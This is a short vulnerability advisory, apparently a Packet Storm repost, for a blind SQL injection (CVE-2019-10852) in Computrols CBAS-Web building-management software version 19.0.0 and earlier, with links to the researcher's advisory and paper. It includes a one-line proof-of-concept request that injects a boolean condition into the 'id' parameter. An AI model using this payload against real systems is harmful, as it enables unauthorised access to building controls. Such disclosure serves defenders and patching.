Computrols CBAS-Web 19.0.0 Blind SQL Injection

Computrols CBAS-Web versions 19.0.0 and below suffer from a remote blind SQL injection vulnerability.

MD5 | 640f8db598a83f5700d896d5ef44f45f


Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection

Affected versions: 19.0.0 and below
CVE: CVE-2019-10852
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic

PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

Computrols CBAS-Web 19.0.0 Blind SQL Injection